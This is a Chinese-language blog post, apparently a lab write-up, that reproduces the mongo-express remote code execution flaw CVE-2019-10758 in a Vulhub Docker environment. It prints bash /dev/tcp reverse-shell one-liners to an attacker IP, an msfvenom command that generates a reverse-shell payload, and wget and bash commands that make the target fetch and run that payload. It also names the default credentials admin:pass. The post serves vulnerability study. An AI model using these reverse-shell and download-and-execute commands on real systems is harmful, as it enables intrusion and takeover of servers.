学习Vulhub的mongo-express远程代码执行漏洞(CVE...

信息安全不简单鸭 2024-07-18 10:55:04

mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。[1]

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞

docker-compose build //可选docker-compose up -d

完成试验后,记得删除漏洞环境哦~~

docker-compose downdocker system prune -a -f //可选

简单访问一下,说明mongo-express 远程代码执行漏洞(CVE-2019-10758)环境搭建成功了

反弹shell无效的语句

bash -c 'bash -i >& /dev/tcp/174.137.58.6/8888 0>&1'bash -c $@|bash 0 echo bash -i >&/dev/tcp/174.137.58.6/8888 0>&1

只能靠文件上传了,先准备好反弹shell文件

msfvenom -p cmd/unix/reverse_python LHOST=174.137.58.6 LPORT=8888 -f raw > ailx10.py

通过BurpSuite构造请求,让靶机主动下载反弹shell文件

wget http://174.137.58.6:7777/ailx10.py -O /tmp/shell

再次通过BurpSuite构造请求,让靶机主动执行反弹shell

bash /tmp/shell

见证奇迹的时刻到了,反弹shell成功

参考^mongo-express 远程代码执行漏洞(CVE-2019-10758) https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/
0 阅读:0

信息安全不简单鸭

简介:感谢大家的关注